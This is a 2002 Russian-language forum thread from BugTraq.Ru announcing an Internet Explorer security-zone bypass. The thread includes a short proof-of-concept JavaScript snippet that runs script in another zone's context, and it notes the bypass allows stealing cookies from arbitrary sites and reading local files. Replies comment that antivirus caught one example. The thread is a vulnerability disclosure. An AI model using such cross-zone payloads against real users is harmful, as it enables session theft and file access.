информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Spanning Tree Protocol: недокументированное применениеГде водятся OGRыПортрет посетителя
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 С наступающим 
 Серьезная уязвимость в Apache Log4j 
 Крупный взлом GoDaddy 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / site updates
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Обход зон безопасности в IE 07.10.02 22:57  Число просмотров: 1188
Автор: Digital_Scream Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Как на меня ничего особенного. Обход зон безопасности в IE сталь обычным делом. Есть способы на любой вкус, а это еще один :)
<site updates>
Обход зон безопасности в IE 03.10.02 02:32  
Publisher: dl <Dmitry Leonov>
Отредактировано 03.10.02 02:55  Количество правок: 1
<"чистая" ссылка>
Обход зон безопасности в IE
пример 1,пример 2 http://www16.brinkster.com/liudieyu/SaveRef/SaveRef-MyPage.htm, http://jscript.dk/2002/10/sec/SaveRefLocalFile.html

Сохранение ссылки на NewWindow.location.assign, где NewWindow - окно, созданное скриптом, позволяет выполнить произвольный скрипт в любой зоне безопасности:
function f(){}
w=window.open("nothing.htm","_blank","height=150 width=150 left=0 top=0");
f=w.location.assign;
w.location.href="http://www.yahoo.com";
alert("wait for the page");
f("javascript:alert(document.body.innerHTML)");
Первой строчкой открываем окно с локальным файлом (возможно, и несуществующим), сохраняем ссылку н аэто окно, далее, открыв в нем страницу из другой зоны, вызываем код в ее контексте.
Помимо кражи кук пользователя с произвольных сайтов, это дает возможность получить доступ к локальным файлам - см. пример 2.


Полный текст
Обход зон безопасности в IE 05.10.02 02:26  
Автор: RedAndr UfaTeam <Андрей Рыжков> Статус: Member
<"чистая" ссылка>
Помимо кражи кук пользователя с произвольных сайтов, это
> дает возможность получить доступ к локальным файлам - см.
> пример 2.
У меня AVP второй пример зарубил :)
Обход зон безопасности в IE 07.10.02 22:57  
Автор: Digital_Scream Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Как на меня ничего особенного. Обход зон безопасности в IE сталь обычным делом. Есть способы на любой вкус, а это еще один :)
1






Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2022 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach